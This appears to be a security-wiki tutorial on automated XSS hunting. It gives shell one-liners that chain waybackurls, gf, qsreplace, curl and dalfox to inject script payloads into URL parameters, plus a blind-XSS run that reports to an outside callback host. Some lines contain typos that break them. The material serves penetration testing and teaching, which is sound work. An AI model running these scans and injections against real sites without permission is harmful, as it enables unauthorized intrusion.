Automated XSS

Make sure you have Go installed on your Machine

To Install Go on your Machine:

  1) sudo apt install -y golang
  2) export GOROOT=/usr/lib/go
  3) export GOPATH=$HOME/go
  4) export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
  5) source .bashrc

How to Hunt Blind XSS using Dalfox?

Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target.
Use GF patterns to find Possible XSS Vulnerable Parameters.
Use Dalfox to find XSS.
Steps :

waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txt

How to Hunt Reflected XSS?

Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target.
Use qsreplace for Accept URLs on stdin, replace all query string values with a user-supplied value, only output each combination of query string parameters once per host and path.
Steps :

waybackurls testphp.vulnweb.com| grep '=' | qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done

Find the parameters which are not filtering special characters - One Liner

echo "test.url" | waybackurls | grep "=" | tee waybackurls.txt
cat waybackruls | egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | qsreplace '"><()'| tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && echo -e "$host \033[91m Vullnerable \e[0m \n" || echo -e "$host  \033[92m Not Vulnerable \e[0m \n"; done | tee XSS.txt

Tools Download Links:-

Find Script here : QuickXSS

If you have any Questions, Reach out to me via Twitter

Twitter : Fani Malik

Twitter : Faizee Asad

Twitter : Prince Prafull

PreviousXSS Bypass NextPost Message Xss

Last updated 1 year ago